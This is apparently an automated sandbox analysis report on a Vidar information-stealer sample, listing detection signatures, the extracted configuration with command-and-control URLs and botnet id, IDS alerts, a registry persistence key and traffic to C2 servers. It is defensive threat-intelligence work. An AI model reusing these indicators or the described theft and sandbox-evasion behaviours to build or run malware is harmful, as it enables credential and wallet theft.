Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7ZthFNAqYp.exe

Overview

General Information

Sample name:7ZthFNAqYp.exe
renamed because original name is a hash value
Original sample name:6733924c670207ed7755dc0fe2286c36.exe
Analysis ID:1539807
MD5:6733924c670207ed7755dc0fe2286c36
SHA1:2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
SHA256:a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
Tags:32exetrojan
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 7ZthFNAqYp.exe (PID: 3536 cmdline: "C:\Users\user\Desktop\7ZthFNAqYp.exe" MD5: 6733924C670207ED7755DC0FE2286C36)
    • 7ZthFNAqYp.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\7ZthFNAqYp.exe" MD5: 6733924C670207ED7755DC0FE2286C36)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 10 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.7ZthFNAqYp.exe.27e0000.5.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.7ZthFNAqYp.exe.27e0000.5.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        0.2.7ZthFNAqYp.exe.833b9e.3.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          Click to see the 9 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\7ZthFNAqYp.exe, ProcessId: 3536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AttoDesignerEditor

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T07:03:10.116209+020020287653Unknown Traffic192.168.2.64998995.217.220.103443TCP
                          2024-10-23T07:03:11.614777+020020287653Unknown Traffic192.168.2.64999095.217.220.103443TCP
                          2024-10-23T07:03:13.666136+020020287653Unknown Traffic192.168.2.64999195.217.220.103443TCP
                          2024-10-23T07:03:15.274549+020020287653Unknown Traffic192.168.2.64999295.217.220.103443TCP
                          2024-10-23T07:03:16.883942+020020287653Unknown Traffic192.168.2.64999395.217.220.103443TCP
                          2024-10-23T07:03:18.571787+020020287653Unknown Traffic192.168.2.64999495.217.220.103443TCP
                          2024-10-23T07:03:19.790589+020020287653Unknown Traffic192.168.2.64999595.217.220.103443TCP
                          2024-10-23T07:03:26.679279+020020287653Unknown Traffic192.168.2.64999795.217.220.103443TCP
                          2024-10-23T07:03:40.979719+020020287653Unknown Traffic192.168.2.65000095.217.220.103443TCP
                          2024-10-23T07:03:43.236395+020020287653Unknown Traffic192.168.2.65000195.217.220.103443TCP
                          2024-10-23T07:03:45.076079+020020287653Unknown Traffic192.168.2.65000295.217.220.103443TCP
                          2024-10-23T07:03:47.374464+020020287653Unknown Traffic192.168.2.65000395.217.220.103443TCP
                          2024-10-23T07:03:49.523853+020020287653Unknown Traffic192.168.2.65000495.217.220.103443TCP
                          2024-10-23T07:03:51.569193+020020287653Unknown Traffic192.168.2.65000595.217.220.103443TCP
                          2024-10-23T07:03:53.515354+020020287653Unknown Traffic192.168.2.65000695.217.220.103443TCP
                          2024-10-23T07:03:55.459525+020020287653Unknown Traffic192.168.2.65000795.217.220.103443TCP
                          2024-10-23T07:03:58.412343+020020287653Unknown Traffic192.168.2.65000895.217.220.103443TCP
                          2024-10-23T07:03:59.700362+020020287653Unknown Traffic192.168.2.65000995.217.220.103443TCP
                          2024-10-23T07:04:01.246503+020020287653Unknown Traffic192.168.2.65001095.217.220.103443TCP
                          2024-10-23T07:04:02.819275+020020287653Unknown Traffic192.168.2.65001195.217.220.103443TCP
                          2024-10-23T07:04:04.926276+020020287653Unknown Traffic192.168.2.65001295.217.220.103443TCP
                          2024-10-23T07:04:07.550843+020020287653Unknown Traffic192.168.2.65001395.217.220.103443TCP
                          2024-10-23T07:04:09.179772+020020287653Unknown Traffic192.168.2.65001495.217.220.103443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T07:03:15.971660+020020442471Malware Command and Control Activity Detected95.217.220.103443192.168.2.649992TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T07:03:17.565702+020020518311Malware Command and Control Activity Detected95.217.220.103443192.168.2.649993TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-23T07:03:17.565183+020020490871A Network Trojan was detected192.168.2.64999395.217.220.103443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 7ZthFNAqYp.exeAvira: detected
                          Found malware configuration
                          Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/fun88rockskek"], "Botnet": "65158feadb3cebfa5c9a9e36f0d461fe"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exeReversingLabs: Detection: 15%
                          Multi AV Scanner detection for submitted file
                          Source: 7ZthFNAqYp.exeReversingLabs: Detection: 44%
                          Source: 7ZthFNAqYp.exeVirustotal: Detection: 44%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009280A1 CryptUnprotectData,LocalAlloc,LocalFree,2_2_009280A1
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00928048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00928048
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00931E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00931E32
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,2_2_0092A7AD
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6CB0A9A0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB044C0 PK11_PubEncrypt,2_2_6CB044C0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6CAD4420
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB04440 PK11_PrivDecrypt,2_2_6CB04440
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6CB525B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6CAEE6E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAE8670 PK11_ExportEncryptedPrivKeyInfo,2_2_6CAE8670
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6CB0A650
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6CB2A730
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6CB30180
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB043B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6CB043B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB27C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6CB27C00
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6CB2BD30
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6CAE7D60
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB29EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6CB29EC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB03FF0 PK11_PrivDecryptPKCS1,2_2_6CB03FF0

                          Compliance

                          barindex
                          Detected unpacking (creates a PE file in dynamic memory)
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeUnpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack
                          Source: 7ZthFNAqYp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2
                          Source: Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                          Source: Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00936013
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00929CF1
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0093547D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0092D59B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00921D80
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0092B5B4
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00934D08
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0092BF22
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0092B914
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00935B4D
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0092CD0C
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00935182
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]2_2_009214AD
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax2_2_009214AD

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49993 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.6:49993
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.6:49992
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199786602107
                          Source: Malware configuration extractorURLs: https://t.me/fun88rockskek
                          Source: global trafficHTTP traffic detected: GET /fun88rockskek HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 107.191.36.218Connection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
                          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49990 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49992 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49994 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49989 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49991 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50000 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50002 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50001 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50003 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49997 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49993 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50004 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50006 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50007 -> 95.217.220.103:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50005 -> 95.217.220.103:443
